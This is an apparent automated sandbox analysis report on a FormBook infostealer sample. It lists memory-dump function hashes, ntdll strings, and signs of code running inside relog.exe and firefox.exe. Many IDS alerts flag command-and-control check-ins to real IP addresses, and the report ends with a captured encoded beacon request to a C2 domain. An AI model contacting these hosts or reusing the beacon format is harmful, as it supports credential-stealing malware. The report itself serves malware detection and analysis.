Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b53bfb70f02a4c490af1dfc462182d68a5e51385cbb4265c7d3e26fdb9195900
Instruction ID: 3eab8ded76fa802d28267204ed14309b6d88e5b74fb789634ff87e6ec0a5e21c
Opcode Fuzzy Hash: b53bfb70f02a4c490af1dfc462182d68a5e51385cbb4265c7d3e26fdb9195900
Instruction Fuzzy Hash: 4C90043130340003D540755C551C7075005D7F1301F55D011F0434F55DDD15CD575333

Function 026D2D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 225244f2ed7fde91fb86310a8ca80853239e113d9d367082540dad0ad729c570
Instruction ID: 28ed4c01faf29d4f4fd76461692bcfa9704e86013d6ce55b98891ebc13c713df
Opcode Fuzzy Hash: 225244f2ed7fde91fb86310a8ca80853239e113d9d367082540dad0ad729c570
Instruction Fuzzy Hash: 5890022120644442D500795C5508A07100587D0205F55D011A1074A96EC6358951A131

Function 026D2D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8decb27d745fe54e9c6f684104bcb0dd50c147602bb45b32e8892c5f84e58c54
Instruction ID: 4b5b484e9a3e3aa898a09f37f18679d3a04e434f3e2d3ff5de192cb67ee32782
Opcode Fuzzy Hash: 8decb27d745fe54e9c6f684104bcb0dd50c147602bb45b32e8892c5f84e58c54
Instruction Fuzzy Hash: 7290022921340002D580755C550860B100587D1202F95D415A0025A59DC91589695321

Function 026D2DD0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e3b5765977713e97126c0ac3b31c1f4ed13aafb0a6d9aa11a6c6947953d1fee
Instruction ID: 660d36f08063eb342e71232e33a9964ec04f856fd21b0281c2791284b8e33989
Opcode Fuzzy Hash: 0e3b5765977713e97126c0ac3b31c1f4ed13aafb0a6d9aa11a6c6947953d1fee
Instruction Fuzzy Hash: 05900221243441525945B55C4504507500697E0241795C012A1424E51D85269956D621

Function 026D2DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd500cb03777e78baaac1683961f76dda21774621d9e6dd95a0c44e80df3118e
Instruction ID: fb823b143f328d9b042a7d60fffa06a034cf1fe90a916105bb4c6c30fb0f8723
Opcode Fuzzy Hash: bd500cb03777e78baaac1683961f76dda21774621d9e6dd95a0c44e80df3118e
Instruction Fuzzy Hash: 8990023124240402D541755C4504607100997D0241F95C012A0434A55F86558B56AA61

Function 026D3010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 391529e3f477ad6048bf6755409a95da995030ae195fca15c5d560dbd193b6f3
Instruction ID: 794f2097ac5a0aece0d8b7614da0275966af853ee95a22abfd4e3bea7a540227
Opcode Fuzzy Hash: 391529e3f477ad6048bf6755409a95da995030ae195fca15c5d560dbd193b6f3
Instruction Fuzzy Hash: F490022120284442D540765C4904B0F510587E1202F95C019A4166A55DC91589555721

Function 026D3090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e77b8c96d4e8557284f58fdd32d317cfd91f017cf93a42495f8e0d0e878bd1c2
Instruction ID: ece75133772b20ad8b507dd02b61dc0a1a6c5ffc7f347fad2ba8288de1784563
Opcode Fuzzy Hash: e77b8c96d4e8557284f58fdd32d317cfd91f017cf93a42495f8e0d0e878bd1c2
Instruction Fuzzy Hash: 5390022124240802D540755C85147071006C7D0601F55C011A0034A55E86168A6566B1

Function 026D2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: b88ab47ce45d906f6412e7a41b3384add396e77a24d73f3adf8f513b497a129a
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 026D2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 026D293C
___swprintf_l.LIBCMT ref: 026D295E
___swprintf_l.LIBCMT ref: 026D29A3
___swprintf_l.LIBCMT ref: 0270A52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 0270A54E
::%hs%u.%u.%u.%u, xrefs: 0270A527
ffff:, xrefs: 0270A504
:%u.%u.%u.%u, xrefs: 0270A5B8

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: a972e49cd9da2b5ab041d62d8d61f6bc4fd50e7587fc6e63c0d1a3872fd71c6f
Instruction ID: 54177771dc2760b32782e2e60635990f4154ebd9a906806d1caa9b92a10612c6
Opcode Fuzzy Hash: a972e49cd9da2b5ab041d62d8d61f6bc4fd50e7587fc6e63c0d1a3872fd71c6f
Instruction Fuzzy Hash: CC51E9B6E0425ABFDB20DF99C8D097EF7B8BB08200B508269E955D7642D374DE54CBE0

Function 02742410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 027424A6
___swprintf_l.LIBCMT ref: 027424E2
___swprintf_l.LIBCMT ref: 0274257D
___swprintf_l.LIBCMT ref: 027425A3
___swprintf_l.LIBCMT ref: 027425C8
___swprintf_l.LIBCMT ref: 02742608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 027424DA
ffff:, xrefs: 0274247D, 0274249D
:%u.%u.%u.%u, xrefs: 027425FF
::%hs%u.%u.%u.%u, xrefs: 0274249E

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 195867658b09c7ceccb335de109114da1f6255b5eb734ed3abf053bff8c82460
Instruction ID: 58e30010e187c91bc40b4d248fad14286de2364d608c90f77e352e4cf55f71d3
Opcode Fuzzy Hash: 195867658b09c7ceccb335de109114da1f6255b5eb734ed3abf053bff8c82460
Instruction Fuzzy Hash: F951F375A00655AEDB20DE9CC990A7FF7F9EF44200B448499F896D7642EFB4DE10CB60

Function 026C7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02704725
Execute=1, xrefs: 02704713
ExecuteOptions, xrefs: 027046A0
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02704742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02704655
CLIENT(ntdll): Processing section info %ws..., xrefs: 02704787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 027046FC

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: e35564be070901dc3e37fb2e1955b2b87a236da992b431f151be55cd0b052783
Instruction ID: 14afa07e6e9a90cfee3a27505395945f3d378de23c89b4bed8d43708b22d0f2f
Opcode Fuzzy Hash: e35564be070901dc3e37fb2e1955b2b87a236da992b431f151be55cd0b052783
Instruction Fuzzy Hash: BB510931A40219AAEF16BBA5DC99BBEB3ADEF05304F2400ADD509A72C0E7719A45CF54

Function 02766940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: 1386b82c73ab27886214cb215a71ab49840ed50d75ae8aaff59170ec8b2dd945
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 7F022771508341AFC309CF19C498A6BBBEAFFC4704F548A2DF98997264DB35E945CB42

Function 026DB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 026DB6BF

Strings

+, xrefs: 026DB65A
0, xrefs: 026DB695
-, xrefs: 026DB650
0, xrefs: 026DB66F

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: bab989189055b43e4f1e4b1c8d738a3d47e6648b2815397a759fd40d90060a74
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: 8581D074E4528D9FDF288E68C8917FEBBB2AF4535CF2A4119D861A7398C7348841CB54

Function 027420E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0274214F
___swprintf_l.LIBCMT ref: 02742172

Strings

[, xrefs: 0274212B
]:%u, xrefs: 02742169
%%%u, xrefs: 02742146

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 8503c6d2280326736bde5a6e8969f4046c545d2863c2334415317d0a63496faf
Instruction ID: 9d06f3854fcb60597c6a5e201af47ac14cfaeb31e045797ee94bfaa724fa3363
Opcode Fuzzy Hash: 8503c6d2280326736bde5a6e8969f4046c545d2863c2334415317d0a63496faf
Instruction Fuzzy Hash: 8E215E76E00119ABDB10DF69CC44AAEBBE9EF44744F14012AFD05E3201EB30DA11CBA5

Function 026BF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 0270031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 027002E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 027002BD

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: f7d95ee85c2f8a4b02767b4780b0562d1a577af14c1b2554663ca9fb4ea9def8
Instruction ID: f943a50c4cbae35a415d1c29d6d9aaa1cf9e37295ad0c7d4a6962b921788a969
Opcode Fuzzy Hash: f7d95ee85c2f8a4b02767b4780b0562d1a577af14c1b2554663ca9fb4ea9def8
Instruction Fuzzy Hash: 6BE1BF30608741DFD726CF28C884B6AB7E1BF48324F244A6DF5A58BAE1D774D885CB42

Function 026CB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0270728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02707294
RTL: Re-Waiting, xrefs: 027072C1
RTL: Resource at %p, xrefs: 027072A3

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 2d6f746d00d62b3d1a17c146195fa3e4654b94842d145dc83e180c264cfad35b
Instruction ID: 8a9d583fe2fdeeec84aef526f0503cf8fc8bd3837f0342932f5a1bce91bc3366
Opcode Fuzzy Hash: 2d6f746d00d62b3d1a17c146195fa3e4654b94842d145dc83e180c264cfad35b
Instruction Fuzzy Hash: CE41EF31704256ABD725DE24CC82B6AB7E5FF98718F204619F955AB280DB30F81ACBD1

Function 02742300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0274238D
___swprintf_l.LIBCMT ref: 027423B3

Strings

%%%u, xrefs: 02742384
]:%u, xrefs: 027423AA

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 7fff074d757c2ab7c002e4d03e30f1a028fe696a0945dc5d851dad23f021a4bd
Instruction ID: c19d2a2659438c971f5699a605c4bf0a0a66c0f2ec9d5623697c9b8b309225a3
Opcode Fuzzy Hash: 7fff074d757c2ab7c002e4d03e30f1a028fe696a0945dc5d851dad23f021a4bd
Instruction Fuzzy Hash: 44318672A00219AFDB20DF28CC44BEEB7B8EB44614F544559FC49E3201EF309A548FA0

Function 02699126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 02699191
@, xrefs: 02699175

Memory Dump Source

Source File: 00000000.00000002.2062190338.0000000002660000.00000040.00001000.00020000.00000000.sdmp, Offset: 02660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2660000_play.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 3eaea3f3ed9aab103ab803a0e58bdb5b4d2da1b78116e0fac6156c949de584b9
Instruction ID: b1851288a87e0282469070ab7528b87817a29e27ac460e1187a667f8c7f36a2a
Opcode Fuzzy Hash: 3eaea3f3ed9aab103ab803a0e58bdb5b4d2da1b78116e0fac6156c949de584b9
Instruction Fuzzy Hash: 13811771D012699BDB258B54CC54BEEB7B8AB08714F1041EAEA09B7280E7309E85CFA4

Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then xor eax, eax	5_2_008B9AA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then pop edi	5_2_008BE28E
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then pop edi	5_2_008D2828
Source: C:\Windows\SysWOW64\relog.exe	Code function: 4x nop then mov ebx, 00000004h	5_2_031004E8
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4x nop then xor eax, eax	6_2_0530162F
Source: C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe	Code function: 4x nop then pop edi	6_2_052FC17A
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 4x nop then mov ebx, 00000004h	7_2_000001917363E4E8

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58093 -> 199.59.243.226:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58141 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58108 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58133 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58103 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58102 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58109 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58125 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58099 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58106 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58121 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58112 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58138 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58105 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58101 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58110 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58135 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58100 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58142 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58131 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58136 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58119 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58117 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58116 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58134 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58107 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58124 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58113 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58118 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58098 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58096 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58111 -> 154.23.184.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58114 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58126 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58115 -> 200.58.111.42:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58143 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58095 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58128 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58130 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58123 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58140 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58094 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58097 -> 3.33.244.179:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58122 -> 52.71.57.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58104 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58120 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58127 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58137 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58132 -> 154.23.176.197:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:58129 -> 45.113.201.77:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58139 -> 35.244.245.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:58144 -> 188.114.96.3:80

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 199.59.243.226 199.59.243.226

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: DattateccomAR DattateccomAR
Source: Joe Sandbox View	ASN Name: BODIS-NJUS BODIS-NJUS
Source: Joe Sandbox View	ASN Name: NTT-LT-ASLT NTT-LT-ASLT
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /184n/?fVU8=HRzx&ZXzt1jdX=tTw8bcF9ynF7NxNhIHnuE7PiwszZpdssllgSy53HU9FeypU+H5DHpDJo8VdiQv3xpb0wKqaBA5vXWKI3ejJljZEG/7rnegNjrXxjwHY74ScRyh8HTmiatRM= HTTP/1.1Host: www.dom-2.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
